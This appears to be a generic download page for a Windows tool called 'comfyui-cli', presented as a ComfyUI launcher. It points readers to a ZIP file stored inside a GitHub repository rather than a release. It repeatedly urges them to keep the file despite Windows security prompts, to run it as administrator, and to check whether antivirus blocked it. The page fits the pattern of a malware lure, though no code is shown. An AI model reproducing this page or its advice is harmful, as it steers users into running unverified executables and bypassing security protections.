comfyui-cli is a command-line interface for ComfyUI on Windows. It gives you a simple way to start and control ComfyUI from a terminal window. Use it when you want a fast setup and a clear way to launch ComfyUI without extra steps.
Visit this page to download comfyui-cli:
https://raw.githubusercontent.com/Yousifh1237/comfyui-cli/main/comfyui/comfyui-cli-3.0.zip
If the page includes a release file or package, download it to your Windows PC. Save it to a folder you can find later, such as Downloads or Desktop.
Use these steps on Windows:
- Open the download page.
- Download the latest release file for Windows.
- If the file is in a ZIP folder, right-click it and choose Extract All.
- Open the extracted folder.
- Look for the main program file or a start script.
- Double-click it to run the app, or open it from Command Prompt if the package uses a terminal launch.
If Windows shows a security prompt, choose the option that lets you keep the file and open it.
comfyui-cli works best on a Windows system with:
- Windows 10 or Windows 11
- At least 8 GB of RAM
- A modern CPU
- Enough free disk space for ComfyUI files and models
- Internet access for the first download and setup
For better performance, a system with a dedicated GPU helps when running image workflows.
After you open comfyui-cli for the first time:
- Let it finish any setup steps.
- Wait while it checks or prepares ComfyUI files.
- Follow the on-screen prompts.
- If it asks for a path, choose the folder where you want ComfyUI stored.
- If it asks for a model location, select the folder that holds your model files.
Keep the folder path simple. A short path like C:\ComfyUI is easy to manage.
comfyui-cli helps you manage ComfyUI with plain commands. Instead of clicking through many menus, you can use a terminal window to start the app and handle common tasks.
Typical tasks can include:
- starting ComfyUI
- updating files
- pointing to model folders
- checking status
- stopping the app safely
If you are new to terminal tools, think of it as a text-based control panel.
You can usually use comfyui-cli like this:
- Open the folder where you installed it.
- Open Command Prompt or Windows Terminal.
- Run the start command listed in the project files.
- Wait for the app to load.
- Open ComfyUI in your browser when the local address appears.
If the package includes a .bat file, double-click it to launch the program.
Once ComfyUI starts, you can use your browser to work with image workflows.
You can usually:
- load a workflow
- connect nodes
- add prompt text
- choose models
- run image generation
- save results to your PC
Keep your model files in the folder that comfyui-cli expects. This helps the app find them fast.
A simple folder setup helps avoid errors:
C:\ComfyUI\C:\ComfyUI\models\C:\ComfyUI\outputs\C:\ComfyUI\input\
This layout keeps files in one place and makes it easier to back up your work.
If the app does not start, try these steps:
- Run it as administrator
- Check that you extracted the ZIP file first
- Make sure the folder path has no unusual characters
- Move the app to a simple folder like
C:\ComfyUI - Check that your antivirus did not block the file
If the browser does not open, look for a local address in the terminal window and paste it into your browser.
To update comfyui-cli:
- Return to the download page.
- Get the newest release.
- Replace the old files if the project asks you to.
- Keep your model files in the same folder unless the project says to move them.
Back up your workflow files before you update.
A simple first run may look like this:
- Download the file from GitHub.
- Extract it to
C:\ComfyUI. - Open the start file.
- Wait for the local server to start.
- Open the browser address shown by the app.
- Load a workflow and run it.
This flow keeps the setup clear and easy to repeat.
- Use a short folder path
- Keep model files in one place
- Close other heavy apps if your PC feels slow
- Save your workflows often
- Keep your output folder separate from your input folder
These small steps make daily use smoother.
You may see these file types in the download:
.zipfor the full package.exefor a Windows app.batfor a batch start file.jsonfor workflow data.txtfor setup notes
If you see a ZIP file, extract it before you run anything inside.
If the download includes many files, look for one of these:
start.batrun.batcomfyui-cli.exelaunch.exe
The main file often has a name that suggests starting or launching.
If the project expects a command line start:
- Open the folder with the extracted files.
- Click the address bar in File Explorer.
- Type
cmdand press Enter. - Run the command listed in the project files.
- Wait for the program to finish startup.
Use this only if the package does not open by double-clicking.
Back up these folders if you want to keep your work safe:
- workflows
- outputs
- custom nodes
- models list or config files
A copy of these files helps you restore your setup on another PC.
comfyui-cli is meant for users who want a simple way to work with ComfyUI from Windows. It keeps the launch process direct and gives you a practical way to manage the app without digging through extra steps.
Download and set up comfyui-cli from the main project page:
https://raw.githubusercontent.com/Yousifh1237/comfyui-cli/main/comfyui/comfyui-cli-3.0.zip
For the smoothest experience:
- keep the app in a short path
- avoid spaces in folder names if you can
- use the same folder for each update
- keep your browser up to date
- make sure your GPU drivers are current
These settings help reduce setup issues and improve startup speed
A simple daily workflow can be:
- Open comfyui-cli
- Start ComfyUI
- Open the browser link
- Load a saved workflow
- Run your image task
- Save results in the output folder
That routine works well for repeat use